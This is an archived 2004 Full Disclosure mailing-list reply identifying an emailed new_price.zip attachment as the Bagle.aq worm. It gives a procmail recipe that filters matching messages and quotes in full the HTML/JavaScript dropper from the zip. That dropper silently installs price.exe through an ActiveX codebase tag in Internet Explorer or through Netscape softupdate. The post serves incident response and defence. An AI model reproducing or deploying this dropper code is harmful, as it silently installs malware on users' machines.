Full Disclosure mailing list archives

Re: (no subject)

From: Tremaine <tremaine () gmail com>
Date: Mon, 9 Aug 2004 15:29:23 -0600

On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut
<jgrotegut () directpointe com> wrote:

(In regards to new_price.zip file attachment)

Anyone have any idea what this is, we had some clients just get pretty
hard with this email.  I am unable to find anything on it, from my VERY
Limited knowledge it appears to be a virus exploiting one of the many
holes in IE.  Anyone else see anything on this yet?

Jonathan Grotegut



Bagle.aq with mitgleider-like dropper

Procmail recipe (courtesy of offlist associate), use at your own risk.
[code]
:0 BD
* -1000^0
*   300^0 YJuA6wS8WsBr
*   300^0 zGzjbJDCLB96
*   300^0 BOSKHdXH8Blw
*   300^0 dEi3loqk64su
*   300^0 byusWle0odyf
/dev/null
[/code]


price dot html file included in zip:
[code]
<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
        if ( navigator.platform && navigator.platform != 'Win32' ) {
                location.replace('NOTWIN32WARNING.html');
                return;
        }
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                document.write('<object id="gib" width=1 height=1
classid="CLSID:018B7EC3-EECA-11d
3-8E71-0000E82C6C0D"   codebase="'+exepath+'"></object>');
        } else if (bname == 'Netscape' && bver >= 4) {
                trigger = netscape.softupdate.Trigger;
                if (trigger.UpdateEnabled) {
                        trigger.StartSoftwareUpdate(exepath,
trigger.DEFAULT_MODE)
                } else {
                        location.replace(exepath);
                }
        } else {
                location.replace(exepath);
        }
}

install();

// -->
</script>
</head>
[/code]




Definitions available on McAfee and Trend Micro, and it appears
Symantec should have something by about 6pm.



-- 
Tremaine
IT Security Consultant

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: (no subject), (continued)
- - - Re: (no subject) Micheal Espinola Jr (Aug 09)
  - Re: (no subject) Michael (Aug 09)
  - Re: (no subject) Bob Kehr (Aug 09)
  - RE: (no subject) Bart . Lansing (Aug 09)
  - Re: (no subject) Micheal Espinola Jr (Aug 09)
  - RE: (no subject) Shannon Johnston (Aug 09)
  - RE: (no subject) Eric Paynter (Aug 09)
  - Re: (no subject) Dave King (Aug 09)
  - Re: (no subject) Michael Erdely (Aug 09)
    - Re: (no subject) van Helsing (Aug 09)
  - Re: (no subject) Tremaine (Aug 09)
  - Re: New virus Alan J. Wylie (Aug 09)
  - RE: (no subject) Corey Hart (Aug 09)
- (no subject) Dufresne (Aug 09)
- RE: (no subject) Seamus Hartmann (Aug 09)
- RE: (no subject) Stephen Agar (Aug 09)
- RE: (no subject) Todd Towles (Aug 09)
- RE: (no subject) Michael Poulin - Home Office (Aug 09)
- Re: (no subject) tcleary2 (Aug 10)
- Re: (no subject) Marek Isalski (Aug 10)
- (no subject) phoenix (Aug 11)

(Thread continues...)